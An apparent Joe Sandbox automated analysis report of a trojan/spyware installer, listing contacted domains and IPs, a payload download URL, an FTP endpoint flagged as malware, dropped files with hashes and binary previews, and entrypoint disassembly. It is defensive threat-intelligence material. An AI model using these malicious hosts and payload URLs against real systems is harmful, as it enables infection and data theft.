            NameIPActiveMaliciousAntivirus DetectionReputation
            dual-a-0001.a-msedge.net
            13.107.21.200
            truefalseunknown
            e-0009.e-msedge.net
            13.107.5.88
            truefalseunknown
            solucionest.com.ar
            192.185.112.181
            truefalseunknown
            donaldtrumpverse.com
            103.211.219.10
            truetrueunknown
            ftp.solucionest.com.ar
            unknown
            unknownfalse
              unknown
              NameMaliciousAntivirus DetectionReputation
              http://donaldtrumpverse.com/kO4_tiMHM116.bintrue
              • Avira URL Cloud: safe
              unknown
              NameSourceMaliciousAntivirus DetectionReputation
              http://donaldtrumpverse.com/kO4_tiMHM116.bin2CasPol.exe, 00000004.00000002.5703889334.0000000001267000.00000004.00000020.00020000.00000000.sdmpfalse
              • Avira URL Cloud: safe
              unknown
              http://127.0.0.1:HTTP/1.1CasPol.exe, 00000004.00000002.5727171404.000000001D4B1000.00000004.00000800.00020000.00000000.sdmpfalse
              • Avira URL Cloud: safe
              low
              https://us1.api.ws-hp.com/clienttelemetryCDMDataEventHandler.dll.0.drfalse
              • Avira URL Cloud: safe
              unknown
              http://42ScOTnxUv4XWwo.netCasPol.exe, 00000004.00000002.5727171404.000000001D4B1000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000004.00000003.997300925.000000001C411000.00000004.00000020.00020000.00000000.sdmp, CasPol.exe, 00000004.00000002.5728626213.000000001D5D1000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000004.00000002.5728362756.000000001D5A5000.00000004.00000800.00020000.00000000.sdmpfalse
              • Avira URL Cloud: safe
              unknown
              http://jGgoxh.comCasPol.exe, 00000004.00000002.5727171404.000000001D4B1000.00000004.00000800.00020000.00000000.sdmpfalse
              • Avira URL Cloud: safe
              unknown
              https://pie-us1.api.ws-hp.com/clienttelemetryCDMDataEventHandler.dll.0.drfalse
              • Avira URL Cloud: safe
              unknown
              ftp://ftp.solucionest.com.ar/officeCasPol.exe, 00000004.00000002.5727171404.000000001D4B1000.00000004.00000800.00020000.00000000.sdmptrue
              • Avira URL Cloud: malware
              unknown
              https://schemaregistry.analysis.ext.hp.com/cdm/gun/com.hp.cdm.platform.software.domain.eventing.resoCDMDataEventHandler.dll.0.drfalse
                high
                https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.ziphttps://wwwCasPol.exe, 00000004.00000002.5727171404.000000001D4B1000.00000004.00000800.00020000.00000000.sdmpfalse
                • Avira URL Cloud: safe
                unknown
                http://DynDns.comDynDNSnamejidpasswordPsi/PsiCasPol.exe, 00000004.00000002.5727171404.000000001D4B1000.00000004.00000800.00020000.00000000.sdmpfalse
                • Avira URL Cloud: safe
                unknown
                https://schemaregistry.analysis.ext.hp.com/cdm/id/sw/sysInfoBase.schema.jsonCDMDataEventHandler.dll.0.drfalse
                  high
                  https://stage-us1.api.ws-hp.com/clienttelemetryCDMDataEventHandler.dll.0.drfalse
                  • Avira URL Cloud: safe
                  unknown
                  http://nsis.sf.net/NSIS_ErrorErrorSecuriteInfo.com.Gen.Variant.Nemesis.7222.26141.exefalse
                    high
                    https://schemaregistry.analysis.ext.hp.com/cdm/id/sw/originatorDetail.schema.jsonCDMDataEventHandler.dll.0.drfalse
                      high
                      http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameCasPol.exe, 00000004.00000002.5728626213.000000001D5D1000.00000004.00000800.00020000.00000000.sdmpfalse
                        high
                        • No. of IPs < 25%
                        • 25% < No. of IPs < 50%
                        • 50% < No. of IPs < 75%
                        • 75% < No. of IPs
                        IPDomainCountryFlagASNASN NameMalicious
                        103.211.219.10
                        donaldtrumpverse.comSeychelles
                        394695PUBLIC-DOMAIN-REGISTRYUStrue
                        Joe Sandbox Version:34.0.0 Boulder Opal
                        Analysis ID:635390
                        Start date and time: 27/05/202221:08:542022-05-27 21:08:54 +02:00
                        Joe Sandbox Product:CloudBasic
                        Overall analysis duration:0h 14m 33s
                        Hypervisor based Inspection enabled:false
                        Report type:light
                        Sample file name:SecuriteInfo.com.Gen.Variant.Nemesis.7222.26141.exe
                        Cookbook file name:default.jbs
                        Analysis system description:Windows 10 64 bit 20H2 Native physical Machine for testing VM-aware malware (Office 2019, IE 11, Chrome 93, Firefox 91, Adobe Reader DC 21, Java 8 Update 301
                        Run name:Suspected Instruction Hammering
                        Number of analysed new started processes analysed:38
                        Number of new started drivers analysed:0
                        Number of existing processes analysed:0
                        Number of existing drivers analysed:0
                        Number of injected processes analysed:0
                        Technologies:
                        • HCA enabled
                        • EGA enabled
                        • HDC enabled
                        • AMSI enabled
                        Analysis Mode:default
                        Analysis stop reason:Timeout
                        Detection:MAL
                        Classification:mal100.troj.spyw.evad.winEXE@6/12@3/1
                        EGA Information:
                        • Successful, ratio: 100%
                        HDC Information:
                        • Successful, ratio: 85.5% (good quality ratio 84.3%)
                        • Quality average: 86.7%
                        • Quality standard deviation: 21.4%
                        HCA Information:
                        • Successful, ratio: 98%
                        • Number of executed functions: 0
                        • Number of non-executed functions: 0
                        Cookbook Comments:
                        • Found application associated with file extension: .exe
                        • Adjust boot time
                        • Enable AMSI
                        • Exclude process from analysis (whitelisted): taskhostw.exe, MusNotification.exe, dllhost.exe, RuntimeBroker.exe, SIHClient.exe, backgroundTaskHost.exe, MoUsoCoreWorker.exe, MusNotificationUx.exe, BackgroundTransferHost.exe, WMIADAP.exe, SgrmBroker.exe, svchost.exe
                        • TCP Packets have been reduced to 100
                        • Excluded IPs from analysis (whitelisted): 51.105.236.244, 40.117.96.136
                        • Excluded domains from analysis (whitelisted): www.bing.com, client.wns.windows.com, fs.microsoft.com, slscr.update.microsoft.com, settings-win.data.microsoft.com, arc.msn.com, wd-prod-cp.trafficmanager.net, fe3cr.delivery.mp.microsoft.com, ris.api.iris.microsoft.com, wdcpalt.microsoft.com, a-0001.a-afdentry.net.trafficmanager.net, login.live.com, apimgmttmr17ij3jt5dneg64srod9jevcuajxaoube4brtu9cq.trafficmanager.net, evoke-windowsservices-tas.msedge.net, wd-prod-cp-eu-west-1-fe.westeurope.cloudapp.azure.com, apimgmthszbjimgeglorvthkncixvpso9vnynvh3ehmsdll33a.cloudapp.net, img-prod-cms-rt-microsoft-com.akamaized.net, nexusrules.officeapps.live.com, manage.devcenter.microsoft.com
                        • Not all processes where analyzed, report is missing behavior information
                        • Report size exceeded maximum capacity and may have missing behavior information.
                        • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                        • Report size getting too big, too many NtOpenKeyEx calls found.
                        • Report size getting too big, too many NtProtectVirtualMemory calls found.
                        • Report size getting too big, too many NtQueryValueKey calls found.
                        • Report size getting too big, too many NtReadVirtualMemory calls found.
                        • Report size getting too big, too many NtSetInformationFile calls found.
                        TimeTypeDescription
                        21:11:38API Interceptor2784x Sleep call for process: CasPol.exe modified
                        No context
                        No context
                        No context
                        No context
                        No context
                        Process:C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Nemesis.7222.26141.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):86544
                        Entropy (8bit):6.4808399473205744
                        Encrypted:false
                        SSDEEP:1536:Mw52UwgdVS3ArQSv1fMZxfVtoVwBTqLJiP8JDi:B4Uw8SQrJvaZlVtoVwaBu
                        MD5:B884606DE1CB711FA0FABBA8384FA60C
                        SHA1:2ECD66DE4565AF1C7F8A7016BEAB49B7A7F1CDEA
                        SHA-256:246459B881CCE72B63AD541D0E8B29A3CB4A14ED193D08BDB68159A32F786539
                        SHA-512:173EED4AD24B62203D87BE29721F46C6A2B24A4CDAB888ADC55ADE4154166F06C36A7358EBE2588E13E5790FFF095C90353BAD007D9A30DE26EEBC688C56EAC8
                        Malicious:false
                        Reputation:low
                        Preview:f........6.r.......................................................f.h.........f.j..$..!................................f......f.k........!8..1........................................#K..hJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJ...f.f.f.g....+[.iTppppppppppppppppppppppppppppppppppppppp..A!....f.e.f.c...."m..o..............................f..........f.t..(v"[.999999999999999999999999999999999999...f.......f......*..WC...........................................f........'.z...........................................f.n..o.f.q.. ..+a....................................f...f.a....e..'.HsY{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{f.........f......2..A++++++++++++++++++++++++++++++++++++++++++++++....a..r..a.......7c.:*...................................................f..f.......f.q......$;{......................................-Ir0#.........................................!..i.f.e....f....&.z.M....................................4............f...f.v..,:.NI...........................................
                        Process:C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Nemesis.7222.26141.exe
                        File Type:MS Windows HtmlHelp Data
                        Category:dropped
                        Size (bytes):43566
                        Entropy (8bit):7.382704049850724
                        Encrypted:false
                        SSDEEP:768:7gyaYEUz32Q+MLPybLI1GPlnL7ZsruV+P/34RE+OUuiozjd/6W4:7gvFUz32ftIsMuV+PYSU9o3d/94
                        MD5:27729CF331D3767DF077F52B262D88F3
                        SHA1:EF4B6F74A0608B5A4DC6E3CA465A96137C1CAD74
                        SHA-256:CA601E57DD2C1E6E92145A8A19083599261B626A4D26B04D8C3FD5BDDDB2CB0D
                        SHA-512:AC7B8D61462538011D20BEC2D2BEAE62AB7DAA16866FC9B1CDBBDCEDF47796D93507E2E706CA9DECF0C26D0F1031285B9268A747755ABCB1E4A161B9D9CF98F2
                        Malicious:false
                        Reputation:low
                        Preview:ITSF....`..................|.{.......".....|.{......."..`...............x.......T.......................................ITSP....T...........................................j..].!......."..T...............PMGL................./..../#IDXHDR...M.../#ITBITS..../#STRINGS...2.]./#SYSTEM..f.T./#TOPICS...M.@./#URLSTR...}.5./#URLTBL.....p./#WINDOWS...M.L./$FIftiMain......G./$OBJINST...G.?./$WWAssociativeLinks/..../$WWAssociativeLinks/Property...C../$WWKeywordLinks/..../$WWKeywordLinks/BTree.....L./$WWKeywordLinks/Data...e4./$WWKeywordLinks/Map....../$WWKeywordLinks/Property...# ./Advanced_Phone_Operations.htm....../Audio_Services.htm....../Authorization_Options.htm.....$/Bluetooth Win7 Vista Suite help.hhc...Z.k$/Bluetooth Win7 Vista Suite help.hhk...E.../Bluetooth_Devices.htm..0..z./Bluetooth_Devices_files/...//Bluetooth_Devices_files/colorschememapping.xml...\.:%/Bluetooth_Devices_files/filelist.xml...a.['/Bluetooth_Devices_files/themedata.thmx...<. ./Bluetooth_Settings.htm...*..[./Bluetooth_
                        Process:C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Nemesis.7222.26141.exe
                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                        Category:dropped
                        Size (bytes):101480
                        Entropy (8bit):5.754479856662274
                        Encrypted:false
                        SSDEEP:1536:HMrDKbA8xl6y9Oj2FqnawHzDYwVY4quXoYbggnC:HM6dMy9MHBVY4qAolOC
                        MD5:25F3ECFD195030F6B1BAD60E5EF97163
                        SHA1:749B7E267CDBBC83783DFA4C7BF45134556C13D7
                        SHA-256:FCD740746D2B3E01945E6A099AB4CDD06ECE05818E25D08C5DDAFBD333B0DC84
                        SHA-512:D91803A022DD9A6EF0E77CB231A5FB5DD1BC275F4CC38D886FD365B7EEAD094712ADC4FA3AAFFB8354DC193BAC3B8697F685631AE3B4D23924387706DB3C0DD9
                        Malicious:false
                        Antivirus:
                        • Antivirus: Metadefender, Detection: 0%, Browse
                        • Antivirus: ReversingLabs, Detection: 0%
                        Reputation:low
                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....?!..........." ..0..h............... ........... ....................................`.....................................O.......|............r..h...............T............................................ ............... ..H............text....g... ...h.................. ..`.rsrc...|............j..............@..@.reloc...............p..............@..B.......................H........u................................................................(....*.0..S........ r...pr3..p..(....(1...........o2.....r...pr...pr3..p. (....... r...pr3..p."(....*..........'.......0..K........ r...pr3..p.'(....(1...o4.....r...pr...pr3..p..(....... r...pr3..p.0(....*..................0..L........ r@..pr3..p.6(..........(......r...pr@..pr3..p.=(....... r@..pr3..p.?(....*......... .......0..u........ r...pr3..p.C(.....(...+..(...+.(....%.o....(.....o....(....o....o.
                        Process:C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Nemesis.7222.26141.exe
                        File Type:ASCII text, with very long lines, with no line terminators
                        Category:dropped
                        Size (bytes):40792
                        Entropy (8bit):3.999599228878197
                        Encrypted:false
                        SSDEEP:768:mjZY5hx4iG8s1aNb/ibV5bVWsrUIDCf7+WFIUf4ndUpPacYQoxalE:n5huie1wrGDb8yUkCf7ZLRblE
                        MD5:B62B20F6B03B0C3A561EA7B0AEB0E812
                        SHA1:72B3F32CE0DB4909D7CF0C4385718188C61CA2C6
                        SHA-256:12C49D1622818D8454A1E4BB2EFBF21459CCE0C284A31D53E775B0B24EC849CF
                        SHA-512:CF0942474012DE7A28F26834DCBDFD2BCFF66EFB7DC29E4FE247284C3BF3B03B3BF16A43692D9CCF792B5CA1123298EE10678FF4BA0889587935F086B78759AB
                        Malicious:false
                        Preview:12DD7C5DF1DC1C85A7F912D20270BDE34F75DB974905373A47A9222CF1CD91C18401E69E670598DAC7D11062C350C991B984AFE98D2B41AADC5D1FC42C4A849C81F58769ED9DD262748B85FD4BB9302E37B2A513A839D6EF56718CE0F88E8F3C78431B21BD17D184111E0B6BC4613F4291D2FB97F169B6B72769DB06F441794BE443B272B8D2C24213A717CBD5DD563B39049838D5E85781A0B36B5BFF6028ECFD880173373F1786E49FE13DDF804CD79EF0B78AED8A247EFD8AA720E923B2FDE60D4FAA692EB20B31D2FEEDED7B6ECE2AE00A8702916290821AE2DF083AC9E5077DFB3C75415B100218FD09923BF4A2BD5CE3773EEA4635A9087C162E721AD561A9822BD549067A646B0819D033F8860ECC13485D5D7CD8BCBC7000DEAF01EEAAC82344FE8263E75304485D415EEB03FC9E990FBDD675355156F7BFCEF5D09B4FA39840B44D6B0C31B91B9B851D1F0F46814CF15B15A785C77561585D846941FC200022D9575A9D643BC9827948614A78E90CCBBEF4206D3927662BC493415C7ADD540249A351AD5253ADC362499C8D3FB17FB819625233A6062C278B7C0EC4BA6EB1E7037F2B93D9776187AB0A6B7548753298B7A79642040FAB60D6DD51BE3CAD6317B9714467350E7B8C6B48F17628CA7371D8E951F6E76E63A2C3007FC01B3DC99F034B8E7C042CB7FD31251EDCE49714C2
                        Process:C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Nemesis.7222.26141.exe
                        File Type:PE32+ executable (GUI) x86-64 (stripped to external PDB), for MS Windows
                        Category:dropped
                        Size (bytes):22479
                        Entropy (8bit):5.08095074751023
                        Encrypted:false
                        SSDEEP:384:PxozhVwKBMySMIKoE/pJf2OG3mcJ7t/CWP9At/H:P6Vf2yS0r/pJf6BEWP9At/H
                        MD5:8154B723020AEE70829FFC138C9D1C4C
                        SHA1:6F7AF3827B37845F071625458DF1DB8BA9056FD6
                        SHA-256:902F9D2A239CCAEBA677DB5838654FB6CE7CF3D21243B8EF122E9D970714B0D3
                        SHA-512:D3F59F778AA72D26896AA2C81972F144DAB716DFA8E45E7B3C59F528B2752FE9E8971C86CF927C62E7501D9910E9D1212EFA1A58C29796A92E2D433116E76931
                        Malicious:false
                        Antivirus:
                        • Antivirus: Metadefender, Detection: 0%, Browse
                        • Antivirus: ReversingLabs, Detection: 0%
                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d........N..E.....&....%. ...J.................@....................................>.....`... ..............................................................P..@............................................@..(...................\................................text...X........ ..................`..`.data........0.......$..............@....rdata.......@.......&..............@..@.pdata..@....P.......2..............@..@.xdata.......`.......6..............@..@.bss.........p...........................idata...............8..............@....CRT....`............B..............@....tls.................D..............@....rsrc................F..............@....reloc...............L..............@..B........................................................................................................................................................................
                        Process:C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Nemesis.7222.26141.exe
                        File Type:PE32+ executable (DLL) (console) x86-64 (stripped to external PDB), for MS Windows
                        Category:dropped
                        Size (bytes):602739
                        Entropy (8bit):6.344393812734055
                        Encrypted:false
                        SSDEEP:12288:PCaPBchMCFjXEbIaM43VV1oSIG5BY5IikQH/oNguISjFovd:KaaMCeVV1oSIG5BY3/oNuSjFovd
                        MD5:58BFEB91921D4882F7EDABAB9C0C1C17
                        SHA1:596DB0512A25089EF7CDE48CA3393E4F6878FF90
                        SHA-256:5C9DB6D64BAF0250735368825CEC3032EC39999F266125D132157ECC0403EE12
                        SHA-512:A86C5F00109267532531366DF07A0187D2FBB80E1628A6E30508AA74098CAB4CDF5CAD54468929604F89CAA656BDBEF6B2F25C462AA1B72898B66F3B8D227AA2
                        Malicious:false
                        Antivirus:
                        • Antivirus: Metadefender, Detection: 0%, Browse
                        • Antivirus: ReversingLabs, Detection: 0%
                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d........&..V.....&"...%....."......P..........Y....................................P|....`... ......................................`.......p..,...............L...........................................@...(...................$r...............................text...............................`..`.data...............................@....rdata..............................@..@.pdata..L...........................@..@.xdata...#... ...$..................@..@.bss.........P...........................edata.......`......................@..@.idata..,....p......................@....CRT....X............ ..............@....tls................."..............@....reloc...............$..............@..B........................................................................................................................................................................
                        Process:C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Nemesis.7222.26141.exe
                        File Type:PE32+ executable (DLL) (console) x86-64 (stripped to external PDB), for MS Windows
                        Category:dropped
                        Size (bytes):49851
                        Entropy (8bit):5.71925712297816
                        Encrypted:false
                        SSDEEP:768:59P9Y+clVaXLNcGRmDRC31lRrox5iJXx/gn9VFuKVcXGJMRv7hb8u+DwbMORdiPF:HPe+IkBcAEC31luGCQKKWJa8atRIPNQa
                        MD5:6A9928C42EB4375CCEF3A025F3535795
                        SHA1:395703F4970B42F55C2BCB2B8CF3F0D12E192CEB
                        SHA-256:CAA457EF4BD84476790D215FFFF048DEB162CABC14DB3FF679795CCEA8972411
                        SHA-512:27F1E2E3DDF052A05D9F0C48E0936E0D4A7E850E4E835EAED96495E6241167915FCDAD371EA206C5B741846D70FF3AFCBA83269B01ED90B22B3F7F42572F03DB
                        Malicious:false
                        Antivirus:
                        • Antivirus: Metadefender, Detection: 0%, Browse
                        • Antivirus: ReversingLabs, Detection: 0%
                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d...........~.....&"...%.h..........P..........V.............................P.......O....`... .................................................\....0..8....................@..l...........................@...(....................................................text...hf.......h..................`..`.data................l..............@....rdata..P............n..............@..@.pdata..............................@..@.xdata..............................@..@.bss.....................................edata..............................@..@.idata..\...........................@....CRT....X...........................@....tls......... ......................@....rsrc...8....0......................@....reloc..l....@......................@..B................................................................................................................................
                        Process:C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Nemesis.7222.26141.exe
                        File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                        Category:dropped
                        Size (bytes):773968
                        Entropy (8bit):6.901559811406837
                        Encrypted:false
                        SSDEEP:12288:nMmCy3nAgPAxN9ueqix/HEmxsvGrif8ZSy+rdQw2QRAtd74/vmYK6H3BVoe3z:MmCy3KxW3ixPEmxsvGrm8Z6r+JQPzV7z
                        MD5:0E37FBFA79D349D672456923EC5FBBE3
                        SHA1:4E880FC7625CCF8D9CA799D5B94CE2B1E7597335
                        SHA-256:8793353461826FBD48F25EA8B835BE204B758CE7510DB2AF631B28850355BD18
                        SHA-512:2BEA9BD528513A3C6A54BEAC25096EE200A4E6CCFC2A308AE9CFD1AD8738E2E2DEFD477D59DB527A048E5E9A4FE1FC1D771701DE14EF82B4DBCDC90DF0387630
                        Malicious:false
                        Antivirus:
                        • Antivirus: Metadefender, Detection: 0%, Browse
                        • Antivirus: ReversingLabs, Detection: 0%
                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......:.y.~...~...~...w...}...~.......eD.....eD..+...eD..J...eD......eD......eD......eD......Rich~...................PE..L......M.........."!.........................0.....x......................................@..........................H......d...(.......................P.......$L...!..8...........................hE..@............................................text...!........................... ..`.data....Z...0...N..................@....rsrc................f..............@..@.reloc..$L.......N...j..............@..B................................................................................................................................................................................................................................................................................................................................................................
                        Process:C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Nemesis.7222.26141.exe
                        File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                        Category:dropped
                        Size (bytes):12288
                        Entropy (8bit):5.814115788739565
                        Encrypted:false
                        SSDEEP:192:Zjvco0qWTlt70m5Aj/lQ0sEWD/wtYbBHFNaDybC7y+XBz0QPi:FHQlt70mij/lQRv/9VMjzr
                        MD5:CFF85C549D536F651D4FB8387F1976F2
                        SHA1:D41CE3A5FF609DF9CF5C7E207D3B59BF8A48530E
                        SHA-256:8DC562CDA7217A3A52DB898243DE3E2ED68B80E62DDCB8619545ED0B4E7F65A8
                        SHA-512:531D6328DAF3B86D85556016D299798FA06FEFC81604185108A342D000E203094C8C12226A12BD6E1F89B0DB501FB66F827B610D460B933BD4AB936AC2FD8A88
                        Malicious:false
                        Antivirus:
                        • Antivirus: Metadefender, Detection: 3%, Browse
                        • Antivirus: ReversingLabs, Detection: 0%
                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......qr*.5.D.5.D.5.D...J.2.D.5.E.!.D.....2.D.a0t.1.D.V1n.4.D..3@.4.D.Rich5.D.........PE..L.....Oa...........!....."...........*.......@...............................p............@..........................B.......@..P............................`.......................................................@..X............................text.... .......".................. ..`.rdata..c....@.......&..............@..@.data...x....P.......*..............@....reloc.......`.......,..............@..B................................................................................................................................................................................................................................................................................................................................................................................................
                        Process:C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Nemesis.7222.26141.exe
                        File Type:PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
                        Category:dropped
                        Size (bytes):429
                        Entropy (8bit):7.2660585571428715
                        Encrypted:false
                        SSDEEP:12:6v/723xn6PprukRVpsTWuFTEmRpnJGoQ6:9n6P7RvsTWuFTXpnNQ6
                        MD5:84D033B14C06568FA57352CCF18D8D35
                        SHA1:1D75B42F61842E8B0FA8D811DAC72B313CDDCA74
                        SHA-256:3989B93626DC3ED6EF03430AD0B1FF5C6E358DAC76E34ED7C8086579B68E660F
                        SHA-512:EAFE07814DF75D019EB39D999325818CE8F2D164A621E713709EE5E1F3D260EB6BCAA726A17588D034F6A6E7733B71A5141CE5B4CFCE267CBFA22B82D6227783
                        Malicious:false
                        Preview:.PNG........IHDR................a...tIDATx..S.n.P.-.6w7..8;...#.E.].8.....wh.O."......`....^o{...4.R .....4..F{....h..}o.X..d...4M..V.ELH.aA.-.%D<..g.Tj.....x....[E(..J.z..n7...R..X..\..D...!..h5............3.w/... ....K.;c....MO.O.`........h4..d......`~T9::"..I...0p.R..\.....&.....;.F..X.a....;.._%....P.\.B.D..t.D..Y....B.Z..1...5U.U...1...Z..D"R.T..w@:...%.....\...\..-.B......E{....h..;w....p..+....IEND.B`.
                        Process:C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Nemesis.7222.26141.exe
                        File Type:SVG Scalable Vector Graphics image
                        Category:dropped
                        Size (bytes):335
                        Entropy (8bit):4.737555359684875
                        Encrypted:false
                        SSDEEP:6:TMVBd/6o8GUYl/n7S3mc4slZRI2rjFvRbWHFHUHFvCpifW1IUHFBLJZtSKlNK+:TMHdPnnl/nu3i2FZ484sIBLjdlj
                        MD5:C05C42CB3D95BF3BC7F49CCD8DCCA510
                        SHA1:20442E344E95508586B1B2A7B4C6272C3F5C86F8
                        SHA-256:695554CE5F23A275D3C25C27410D0CFBF8A83156807DAA3A601635E4E5D8AED0
                        SHA-512:0EC19BBA7B5032670524965A8C55D8C6401F833000880DE1C0F74A5EAA4E302B0CE3E60218F3DDB95CB3E1EA7374A197CB71682526DFF910D9A6CF35FF971BB6
                        Malicious:false
                        Preview:<?xml version="1.0" encoding="UTF-8"?>.<svg height="16px" viewBox="0 0 16 16" width="16px" xmlns="http://www.w3.org/2000/svg">. <path d="m 4 1 c -1.660156 0 -3 1.339844 -3 3 v 8 c 0 1.660156 1.339844 3 3 3 h 8 c 1.660156 0 3 -1.339844 3 -3 v -8 c 0 -1.660156 -1.339844 -3 -3 -3 z m 0 6 h 8 v 2 h -8 z m 0 0" fill="#2e3436"/>.</svg>.
                        Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
                        File Type:ASCII text, with CRLF line terminators
                        Category:dropped
                        Size (bytes):30
                        Entropy (8bit):3.964735178725505
                        Encrypted:false
                        SSDEEP:3:IBVFBWAGRHneyy:ITqAGRHner
                        MD5:9F754B47B351EF0FC32527B541420595
                        SHA1:006C66220B33E98C725B73495FE97B3291CE14D9
                        SHA-256:0219D77348D2F0510025E188D4EA84A8E73F856DEB5E0878D673079D05840591
                        SHA-512:C6996379BCB774CE27EEEC0F173CBACC70CA02F3A773DD879E3A42DA554535A94A9C13308D14E873C71A338105804AFFF32302558111EE880BA0C41747A08532
                        Malicious:false
                        Preview:NordVPN directory not found!..
                        File type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                        Entropy (8bit):7.766288797716623
                        TrID:
                        • Win32 Executable (generic) a (10002005/4) 99.96%
                        • Generic Win/DOS Executable (2004/3) 0.02%
                        • DOS Executable Generic (2002/1) 0.02%
                        • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                        File name:SecuriteInfo.com.Gen.Variant.Nemesis.7222.26141.exe
                        File size:1007819
                        MD5:77436b29832ded92b60491ea36018196
                        SHA1:0314eca204964e3e189b0c0aed7f449e487dc98e
                        SHA256:b19c8495104c354de9aa1b3403bff2d1211a89fe8892e866d2d8dfd7bb0ba5da
                        SHA512:799337dba429abed98ace7b229214f33706e0f00629992617327706694ec67c45ef9fdb878567eeec27a0e84c8b3a2bae37f572d37a1491bf934571160fd3c7f
                        SSDEEP:24576:bbHw3bPzBxU7lXzd2+gIsofFiXKU74yNC/:fHUnWxlMo9i6/
                        TLSH:A52512216654F813E3900A71C5F6F3BD49B4FE382E61CA03A6687F2D363E75C9929312
                        File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1...Pf..Pf..Pf.*_9..Pf..Pg.LPf.*_;..Pf..sV..Pf..V`..Pf.Rich.Pf.........................PE..L...Z.Oa.................j.........
                        Icon Hash:7cbc7e6e78b0e010
                        Entrypoint:0x40352d
                        Entrypoint Section:.text
                        Digitally signed:false
                        Imagebase:0x400000
                        Subsystem:windows gui
                        Image File Characteristics:LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
                        DLL Characteristics:NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
                        Time Stamp:0x614F9B5A [Sat Sep 25 21:57:46 2021 UTC]
                        TLS Callbacks:
                        CLR (.Net) Version:
                        OS Version Major:4
                        OS Version Minor:0
                        File Version Major:4
                        File Version Minor:0
                        Subsystem Version Major:4
                        Subsystem Version Minor:0
                        Import Hash:56a78d55f3f7af51443e58e0ce2fb5f6
                        Instruction
                        push ebp
                        mov ebp, esp
                        sub esp, 000003F4h
                        push ebx
                        push esi
                        push edi
                        push 00000020h
                        pop edi
                        xor ebx, ebx
                        push 00008001h
                        mov dword ptr [ebp-14h], ebx
                        mov dword ptr [ebp-04h], 0040A2E0h
                        mov dword ptr [ebp-10h], ebx
                        call dword ptr [004080CCh]
                        mov esi, dword ptr [004080D0h]
                        lea eax, dword ptr [ebp-00000140h]
                        push eax
                        mov dword ptr [ebp-0000012Ch], ebx
                        mov dword ptr [ebp-2Ch], ebx
                        mov dword ptr [ebp-28h], ebx
                        mov dword ptr [ebp-00000140h], 0000011Ch
                        call esi
                        test eax, eax
                        jne 00007F716086261Ah
                        lea eax, dword ptr [ebp-00000140h]
                        mov dword ptr [ebp-00000140h], 00000114h
                        push eax
                        call esi
                        mov ax, word ptr [ebp-0000012Ch]
                        mov ecx, dword ptr [ebp-00000112h]
                        sub ax, 00000053h
                        add ecx, FFFFFFD0h
                        neg ax
                        sbb eax, eax
                        mov byte ptr [ebp-26h], 00000004h
                        not eax
                        and eax, ecx
                        mov word ptr [ebp-2Ch], ax
                        cmp dword ptr [ebp-0000013Ch], 0Ah
                        jnc 00007F71608625EAh
                        and word ptr [ebp-00000132h], 0000h
                        mov eax, dword ptr [ebp-00000134h]
                        movzx ecx, byte ptr [ebp-00000138h]
                        mov dword ptr [00434FB8h], eax
                        xor eax, eax
                        mov ah, byte ptr [ebp-0000013Ch]
                        movzx eax, ax
                        or eax, ecx
                        xor ecx, ecx
                        mov ch, byte ptr [ebp-2Ch]
                        movzx ecx, cx
                        shl eax, 10h
                        or eax, ecx
                        Programming Language:
                        • [EXP] VC++ 6.0 SP5 build 8804
                        NameVirtual AddressVirtual Size Is in Section
                        IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                        IMAGE_DIRECTORY_ENTRY_IMPORT0x86100xa0.rdata
                        IMAGE_DIRECTORY_ENTRY_RESOURCE0x6c0000x28498.rsrc
                        IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                        IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                        IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                        IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                        IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                        IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                        IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                        IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                        IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                        IMAGE_DIRECTORY_ENTRY_IAT0x80000x2b0.rdata
